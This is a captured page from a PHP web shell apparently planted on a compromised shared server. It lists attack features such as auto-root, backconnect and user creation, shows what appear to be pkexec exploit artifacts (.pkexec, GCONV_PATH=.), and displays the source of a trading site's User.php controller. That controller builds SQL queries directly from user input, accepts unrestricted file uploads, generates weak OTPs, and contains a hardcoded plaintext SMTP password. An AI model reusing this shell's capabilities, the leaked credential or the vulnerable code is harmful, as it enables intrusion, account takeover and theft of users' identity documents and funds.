Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.121
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
app.tradesense.co.ke /
app /
Controllers /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
BaseController.php
1.36
KB
-rw-r--r--
Cellulant.php
4.9
KB
-rw-r--r--
EFT.php
8.33
KB
-rw-r--r--
Fund.php
18.05
KB
-rw-r--r--
Home.php
22.43
KB
-rw-r--r--
Interest.php
1
B
-rw-r--r--
Ipay.php
20.66
KB
-rw-r--r--
Mpesa.php
19.37
KB
-rw-r--r--
Profile.php
20.49
KB
-rw-r--r--
User.php
17.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : User.php
<?php namespace App\Controllers; use CodeIgniter\Session\Session; use Config\Database; use App\Models\LoginModel; use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\Exception; class User extends BaseController { public function logout() { $session = session(); $session->destroy(); return redirect()->to('/login'); } public function login() { helper(['form']); return view('login'); } public function completeprofile() { $session = Session(); $user = $session->get('user'); if ($user) { $this->db = Database::connect(); $userid= $user['userid']; $number_of_students = "SELECT COUNT(*) as total FROM `notification` WHERE userid ='$userid' AND status = 'Not'"; $data['number_of_new_offers'] = $this->db->query($number_of_students)->getRow(); $queyy = $this->db->query("SELECT * FROM `user` WHERE userid ='$userid'"); $data['merc'] = $queyy->getResultArray(); $number_of_totalfund = "SELECT SUM(amount) as total FROM `funds` WHERE userid ='$userid'"; $data['number_of_newtotl'] = $this->db->query($number_of_totalfund)->getRow(); echo view('completeprofile',$data); } else if (!$user) { return redirect()->to('/login'); // code... } } public function completeprofilepost() { $session = Session(); $user = $session->get('user'); $this->db = Database::connect(); $request = $this->request; $userid= $user['userid']; $fullname = $request->getPost('fullname'); $emailadress = $request->getPost('emailadress'); $mobilenumber = $request->getPost('mobilenumber'); $krapin = $request->getPost('krapin'); $gender = $request->getPost('gender'); $city = $request->getPost('city'); $dateofbirth = $request->getPost('dateofbirth'); $idnumber = $request->getPost('idnumber'); $profesion = $request->getPost('profesion'); $sql = "UPDATE user SET fullname = '$fullname',emailadress = '$emailadress',mobilenumber = '$mobilenumber' WHERE userid = '$userid'"; $update = $this->db->query($sql); $profilepic = $this->request->getFile('profilepic'); $profilepic->move('../public/profile/'); $profile= $profilepic->getName(); $idfront = $this->request->getFile('idfront'); $idfront->move('../public/idfront/'); $idfrontpic= $idfront->getName(); $idback = $this->request->getFile('idback'); $idback->move('../public/idback/'); $idbackpic= $idback->getName(); $userinfoModel = new \App\Models\UserinfoModel(); $data = [ 'krapin' => $krapin, 'gender' => $gender, 'city' => $city, 'dateofbirth' => $dateofbirth, 'idnumber' => $idnumber, 'userid' => $userid, 'profilepic' => $profile, 'idfront' => $idfrontpic, 'profesion' => $profesion, 'idback' => $idbackpic ]; $userdata = $userinfoModel->insert($data); if ($userdata) { $amount = 0; $walletModel = new \App\Models\WalletModel(); $da = [ 'userid' => $userid, 'amount' => $amount, ]; $walletdata = $walletModel->insert($da); $sq = "UPDATE user SET status = 2 WHERE userid = '$userid'"; $updat = $this->db->query($sq); $session->setFlashdata('complete', 'Profile Information Submited '); return redirect()->to('/index'); } } public function auth() { $this->db = Database::connect(); $session = Session(); $model = new LoginModel(); $emailadress = $this->request->getVar('emailadress'); $password = $this->request->getVar('password'); $otp=rand(1111,9999); $data = $model->where('emailadress', $emailadress)->first(); if($data){ $pass = $data['password']; $fullname = $data['fullname']; $phone = $data['mobilenumber']; $userid = $data['userid']; $verify_pass = password_verify($password, $pass); if($verify_pass){ $ses_data = [ 'userid' => $data['userid'], 'emailadress' => $data['emailadress'], 'fullname' => $data['emailadress'], ]; $session->set($ses_data); $sql = "UPDATE user SET otp = '$otp' WHERE userid = '$userid'"; $this->db->query($sql); //Create an instance; passing `true` enables exceptions $length = 14; // Desired length of the random string $phone = (substr($phone, 0, 1) == "+") ? str_replace("+", "", $phone) : $phone; $phone = (substr($phone, 0, 1) == "0") ? preg_replace("/^0/", "254", $phone) : $phone; $phone = (substr($phone, 0, 1) == "7") ? "254{$phone}" : $phone; $randomString = ''; while(strlen($randomString) < $length) { $randomNumber = rand(0, 12); $randomString .= $randomNumber; } $randomString; $variable1 = ''.$phone.''; $variable2 = 'Hi '.$fullname.'.Your New One Time Password is '.$otp.''; $externalUrl = 'http://sms.tradesense.co.ke/sms.php?variable1=' . urlencode($variable1) . '&variable2=' . urlencode($variable2). '&variable3=' . urlencode($randomString); // Make a GET request to the external URL and get the response $response = file_get_contents($externalUrl); // Access the variables if ($response) { $data['mobilenumber'] = $phone; $data['emailadress'] = $emailadress; $data['fullname'] = $fullname; $session->set('user', $data); return redirect()->to(base_url() . '/verify'); }else{ $session->setFlashdata('otp', 'OTP NOT SENT '); return redirect()->to('/login'); } // code... }else{ $session->setFlashdata('pass', 'Wrong Password'); return redirect()->to('/login'); } }else{ $session->setFlashdata('email', 'Email not Found'); return redirect()->to('/login'); } } public function register() { return view('register'); } public function verify() { $session = Session(); $user = $session->get('user'); if (!isset($_SESSION['otp'])) { if ($user) { $userid= $user['userid']; $fullname= $user['fullname'] ; $emailadress = $user['emailadress'] ; return view('verify', $user);}else if (!$user) { return redirect()->to('/login'); // code... } // Redirect the user to a different page }elseif(isset($_SESSION['otp'])){ return redirect()->to('/index'); } } public function verifycode() { $session = Session(); $request = $this->request; $userid = $this->request->getGet('userid'); $this->db = Database::connect(); $otp = $request->getPost('otp'); $verify = $request->getPost('verify'); if ($verify == 'verified') { $queyy = $this->db->query("SELECT * FROM `user` WHERE userid ='$userid'"); $data['merc'] = $queyy->getResultArray(); foreach ($data['merc'] as $user): $emailadress=$user['emailadress'] ; $fullname=$user['fullname'] ; $parentModel = new \App\Models\UserModel(); $otpverify = $parentModel ->where('emailadress', $emailadress) ->where('otp', $otp) ->first(); if ($otpverify) { $session = Session(); $dat['otp'] = $otp; $session->set('otp', $dat); return redirect()->to('/index'); } elseif (!$otpverify) { $session->setFlashdata('verifyfail', 'Wrong Otp Code'); return redirect()->to('/verify'); // code... } endforeach; } } public function forgotpassword() { return view('forgotpassword'); } public function forgotemail() { return view('forgotemail'); } public function forgotpost() { $this->db = Database::connect(); $session = Session(); $model = new LoginModel(); $emailadress = $this->request->getVar('emailadress'); $data = $model->where('emailadress', $emailadress)->first(); $otp=rand(11111,99999); if($data){ $pass = $data['password']; $fullname = $data['fullname']; $userid = $data['userid']; //Create an instance; passing `true` enables exceptions $mail = new PHPMailer(true); try { //Server settings $mail->isSMTP(); //Send using SMTP $mail->Host = 'smtp.gmail.com'; //Set the SMTP server to send through $mail->SMTPAuth = true; //Enable SMTP authentication $mail->Username = 'agreements@tradesense.co.ke'; //SMTP username $mail->Password = 'Tradesense@2022'; //SMTP password $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; //Enable implicit TLS encryption $mail->Port = 587; //TCP port to connect to; use 587 if you have set `SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS` //Recipients $mail->setFrom('agreements@tradesense.co.ke', 'Tradesense'); $mail->addAddress($emailadress,$fullname); //Add a recipient $mail->addReplyTo('no@example.com', 'Information'); //Content $mail->Subject = 'Reset Password'; $mail->Body = 'Hi '.$fullname.' your password reset code is '.$otp.' '; $sent= $mail->send(); if ($sent) { $data['emailadress'] = $emailadress; $data['fullname'] = $fullname; $sl = "UPDATE user SET otp = '$otp' WHERE emailadress = '$emailadress' AND password= '$pass' "; $this->db->query($sl); return redirect()->to(base_url() . '/verifypassword'); } } catch (Exception $e) { echo "Message could not be sent. Mailer Error: {$mail->ErrorInfo}"; } // code... }else{ $session->setFlashdata('email', 'Email not Found'); return redirect()->to('/forgotpassword'); } } public function forgotemailpost() { $this->db = Database::connect(); $session = Session(); $model = new LoginModel(); $mobilenumber = $this->request->getVar('mobilenumber'); $data = $model->where('mobilenumber', $mobilenumber)->first(); $otp=rand(11111,99999); if($data){ $pass = $data['password']; $fullname = $data['fullname']; $emailadress = $data['emailadress']; $userid = $data['userid']; //Create an instance; passing `true` enables exceptions $length = 14; // Desired length of the random string $mobilenumber = (substr($mobilenumber, 0, 1) == "+") ? str_replace("+", "", $mobilenumber) : $mobilenumber; $mobilenumber = (substr($mobilenumber, 0, 1) == "0") ? preg_replace("/^0/", "254", $mobilenumber) : $mobilenumber; $mobilenumber = (substr($mobilenumber, 0, 1) == "7") ? "254{$mobilenumber}" : $mobilenumber; $randomString = ''; while(strlen($randomString) < $length) { $randomNumber = rand(0, 12); $randomString .= $randomNumber; } $randomString; $variable1 = ''.$mobilenumber.''; $variable2 = 'Hi '.$fullname.'.Your Account Email Address :'.$emailadress.''; $externalUrl = 'http://sms.tradesense.co.ke/sms.php?variable1=' . urlencode($variable1) . '&variable2=' . urlencode($variable2). '&variable3=' . urlencode($randomString); // Make a GET request to the external URL and get the response $response = file_get_contents($externalUrl); $session->setFlashdata('phonegotten', 'AN SMS WITH YOUR EMAIL ADDRESS HAS BEEN SENT TO YOUR PHONENUMBER'); return redirect()->to('/forgotemail'); // code... }else{ $session->setFlashdata('phone', 'NO ACCOUNT WAS FOUND THAT MATCHED THAT PHONENUMBER '); return redirect()->to('/forgotemail'); } } public function otpresendpost() { $this->db = Database::connect(); $session = Session(); $model = new LoginModel(); $mobilenumber = $this->request->getVar('mobilenumber'); $data = $model->where('mobilenumber', $mobilenumber)->first(); $otp=rand(11111,99999); if($data){ $pass = $data['password']; $fullname = $data['fullname']; $emailadress = $data['emailadress']; $userid = $data['userid']; //Create an instance; passing `true` enables exceptions $length = 14; // Desired length of the random string $mobilenumber = (substr($mobilenumber, 0, 1) == "+") ? str_replace("+", "", $mobilenumber) : $mobilenumber; $mobilenumber = (substr($mobilenumber, 0, 1) == "0") ? preg_replace("/^0/", "254", $mobilenumber) : $mobilenumber; $mobilenumber = (substr($mobilenumber, 0, 1) == "7") ? "254{$mobilenumber}" : $mobilenumber; $randomString = ''; while(strlen($randomString) < $length) { $randomNumber = rand(0, 12); $randomString .= $randomNumber; } $randomString; $variable1 = ''.$mobilenumber.''; $variable2 = 'Hi '.$fullname.'.Your OPT CODE is :'.$otp.''; $externalUrl = 'http://sms.tradesense.co.ke/sms.php?variable1=' . urlencode($variable1) . '&variable2=' . urlencode($variable2). '&variable3=' . urlencode($randomString); // Make a GET request to the external URL and get the response $response = file_get_contents($externalUrl); $sl = "UPDATE user SET otp = '$otp' WHERE emailadress = '$emailadress' AND fullname= '$fullname' "; $this->db->query($sl); $session->setFlashdata('resent', 'AN NEW OPT HAS BEEN SENT TO YOUR PHONENUMBER'); return redirect()->to('/verify'); // code... }else{ $session->setFlashdata('phone', 'NO ACCOUNT WAS FOUND THAT MATCHED THAT PHONENUMBER '); return redirect()->to('/verify'); } } public function verifypassword() { echo view('verifypassword'); } public function verifypasscode() { $session = Session(); $request = $this->request; $this->db = Database::connect(); $verify = $request->getPost('verify'); $otp = $request->getPost('otp'); if ($verify == 'verified') { $parentModel = new \App\Models\UserModel(); $data = $parentModel->where('otp', $otp)->first(); if($data){ $emailadress = $data['emailadress']; $fullname = $data['fullname']; $userid = $data['userid']; $session = Session(); $dat['otp'] = $otp; $dat['userid'] = $userid; $dat['fullname'] = $fullname; $session->set('forgot', $dat); return redirect()->to('/changepassword'); } else { $session = Session(); $session->setFlashdata('verifyfai', 'Wrong Reset Code'); return redirect()->to('/verifypassword'); // code... } } } public function changepassword() { $session = Session(); $user = $session->get('forgot'); if (isset($_SESSION['forgot'])) { if ($user) { $userid= $user['userid']; $fullname= $user['fullname'] ; return view('changepassword', $user);} else if (!$user) { return redirect()->to('/login'); // code... } // Redirect the user to a different page }elseif(!isset($_SESSION['forgot'])){ return redirect()->to('/index'); } } public function updatepassword() { $session = Session(); $user = $session->get('forgot'); $userid=$user['userid']; $request = $this->request; $this->db = Database::connect(); $password = $request->getPost('password'); $confirmpassword = $request->getPost('confirmpassword'); if ( $password==$confirmpassword ) { $newpassword = password_hash($request->getPost('password'), PASSWORD_DEFAULT); $parentModel = new \App\Models\UserModel(); $at = [ 'password' => $newpassword ]; $fundresult = $parentModel->update($userid, $at); if($fundresult){ $session->setFlashdata('passchanged', 'Your password hass been updated Successfully'); return redirect()->to('/login'); } } else { $session = Session(); $session->setFlashdata('match', 'Your passwords do not match'); return redirect()->to('/changepassword'); // code... } } }
Close
